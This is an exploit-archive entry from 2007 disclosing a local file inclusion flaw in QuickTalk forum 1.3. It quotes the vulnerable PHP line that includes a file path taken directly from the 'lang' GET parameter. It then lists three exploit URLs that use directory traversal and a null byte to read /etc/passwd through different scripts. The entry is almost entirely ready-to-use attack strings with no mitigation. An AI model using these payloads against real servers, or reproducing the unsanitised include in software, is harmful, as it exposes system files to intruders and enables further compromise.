[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : QuickTalk forum 1.3 (lang) Local File Inclusion Vulnerabilities
# Published : 2007-06-27
# Author : Katatafish
# Previous Title : WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability
# Next Title : QuickTicket 1.2 (qti_checkname.php) Local File Inclusion Vulnerability


###QuickTalk forum v1.3 Local File Inclusion###

#download: http://www.qt-cute.org/download/qtf13.zip

#found by: katatafish (karatatata@hush.com)

#vulncode:
 $strLang = $_GET["lang"];
 include("language/$strLang/qtf_lang_reg.inc");

#exploits:

 http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
 http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

#thanks:str0ke

# www.Syue.com [2007-06-27]